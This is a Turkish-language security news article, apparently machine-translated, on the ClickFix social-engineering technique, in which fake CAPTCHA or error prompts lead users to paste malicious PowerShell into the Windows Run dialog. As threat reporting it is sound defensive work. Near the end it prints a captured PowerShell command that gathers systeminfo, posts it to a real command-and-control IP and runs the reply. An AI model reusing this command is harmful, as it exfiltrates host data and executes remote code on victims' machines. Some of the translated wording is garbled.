Siber güvenlik araştırmacıları, günlük bilgisayar etkileşimlerinde temel insan güvenini kullanan sofistike bir yeni sosyal mühendislik kampanyası belirlediler.
Mart 2024’ten beri aktif olarak dağıtılan ClickFix tekniği, herhangi bir ağın en savunmasız bileşenini hedefleyerek geleneksel güvenlik önlemlerini atlayan siber suçlu taktiklerde tehlikeli bir evrimi temsil eder: son kullanıcı.
Bu aldatıcı yöntem, kurbanları kendi sistemlerinde kötü amaçlı kod yürütmeye kandırmak için rutin hata mesajları, captcha doğrulama istemleri veya sistem bakım bildirimleri olarak maskelenir.
.png
)
Teknik, siber suçlu ekosistem boyunca hızla çekiş kazandı ve bireysel bilgisayar korsanlarından APT28 ve Muddywater, sırasıyla Rus ve İran devlet çıkarlarıyla bağlantılı kuruluşlar da dahil olmak üzere sofistike gelişmiş kalıcı tehdit gruplarına dikkat çekti.
ClickFix kampanyaları, sağlık hizmetleri, misafirperverlik, otomotiv ve devlet kurumları da dahil olmak üzere çeşitli sektörlerdeki kuruluşları başarıyla tehlikeye attı ve bu insan merkezli saldırı vektörünün evrensel uygulanabilirliğini gösterdi.
Darktrace analistleri, hem Avrupa, Orta Doğu, Afrika hem de Amerika Birleşik Devletleri’ndeki müşteri ortamlarında birden fazla ClickFix saldırısı belirledi ve bu ortaya çıkan tehdidin küresel kapsamını ortaya koydu.
Araştırmaları, tehdit aktörlerinin mızrak kimlik avı e-postalarını, sürücüden uzlaşmaları ve kötü amaçlı yükler sunmak için GitHub gibi güvenilir platformların kullanımı kullandığı sistematik bir yaklaşımı ortaya çıkardı.
Saldırılar genellikle, şüphesiz kullanıcıları meşru sistem istemleri olarak görünmek üzere tasarlanmış kötü amaçlı URL’lere yönlendiren uzlaşılmış meşru web sitelerinde e -postalara veya kötüverizasyonlara gömülü gizli bağlantılarla başlar.
ClickFix saldırılarının doğasında bulunan psikolojik manipülasyon, görünürdeki teknik sorunları çözmek için kullanıcıların doğal eğilimlerini kullanır.
Mağdurlar, Web sayfası ekran hataları veya cihaz kayıt gereksinimleri gibi var olmayan sorunları ele aldığı görülen sahte captcha istemlerini veya “düzeltin” diyalog kutularını ikna ediyor.
Bir kez nişanlandıktan sonra, kullanıcılar, sonuçta sistemlerinde kötü niyetli PowerShell komutlarının yürütülmesini kolaylaştıran standart üç adımlı bir doğrulama süreci gibi görünen şeylere yönlendirilir.
Bu saldırıların finansal ve operasyonel etkisi ilk sistem uzlaşmasının çok ötesine uzanmaktadır.
Başarılı başlangıç erişimini takiben, tehdit aktörleri, hedeflenen ortamlarda komuta ve kontrol iletişim kanallarını oluşturur ve birincil hedefe duyarlı organizasyonel verilerin elde edilmesi ve eklenmesi amacıyla ağlar aracılığıyla yanal hareket sağlar.
Xworm, Lumma ve Asyncrat dahil olmak üzere çeşitli kötü amaçlı yazılım aileleriyle ilişkili kötü amaçlı yükler, bu kampanyalar sırasında sıklıkla konuşlandırılmaktadır.
Enfeksiyon mekanizmasının teknik analizi
ClickFix saldırılarının teknik karmaşıklığı, karmaşık kötü amaçlı yazılım geliştirmede değil, sosyal mühendisliğin meşru sistem işlevleriyle kesintisiz entegrasyonunda yer almaktadır.
Saldırı zinciri, kurbanlar, çalışma iletişim kutusunu açmak için Windows Key + R’ye basmalarını söyleyen dikkatle hazırlanmış istemlerle karşılaştığında, ardından önceden yüklenmiş kötü niyetli bir PowerShell komutunu yapıştırmak için Ctrl + V tuşuna bastığında başlar ve son olarak yükü yürütmek için Enter tuşuna bastığında başlar.
Darktrace’in belirli bir 9 Nisan 2025 saldırısı ile ilgili araştırması, bu sürecin teknik inceliklerini ortaya çıkardı.
Uzlaşma, komuta ve kontrol altyapısı ile harici iletişimi başlattı ve yeni bir PowerShell kullanıcı aracısının uzaktan kod yürütme girişimini tespit etti.
.webp)
Kötü niyetli PowerShell komutu, sofistike gizleme teknikleri ve zaman damgası tabanlı dosya adlandırma kuralları içeriyordu.
Saldırı sırasında yakalanan ağ trafiğinin analizi, PowerShell betiğinin paket yakalama incelemesi ile işlevselliğini ortaya çıkardı.
Komut, geçerli saati UNIX Epoch formatına dönüştürür ve zararsız sayısal dizeler olarak görünen dinamik olarak adlandırılmış dosyalar oluşturur.
.webp)
Örneğin, saldırı tam olarak yürütme zaman damgasına karşılık gelen “1744205184” adlı bir dosya oluşturdu ve ardından sistem keşif verileri içeren ikincil bir “1744205200” dosya oluşturdu.
$s=[int64](((datetime)::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band 0xfffffffffffff0;
$b="193.36.38.237";
$c="IRM"; $d='POST'; $e="Invoke-Expression";
$f=$(systeminfo|out-string);
&($c) "$b`:8080/$s" -Method $d -Body $f -ContentType 'application/octet-stream'|&($e)Bu PowerShell snippet, 193.36.38.237 numaralı telefondan komut ve kontrol sunucusuna kapsamlı cihaz ayrıntılarını iletmeden önce hedef IP adresi, HTTP yöntemleri ve sistem bilgileri toplama için değişkenler oluşturarak saldırının metodolojisini gösterir.
Pessed edilmiş veriler, tam sistem spesifikasyonlarını, ağ yapılandırmalarını, güvenlik özelliklerini ve donanım ayrıntılarını içeriyordu ve saldırganlara sonraki saldırı aşamalarını planlamak için kapsamlı zeka sağladı.
Tehdit istihbarat aramasıyla tehdit araştırmalarını hızlandırın ve zenginleştirin! -> 50 Deneme Arama İsteği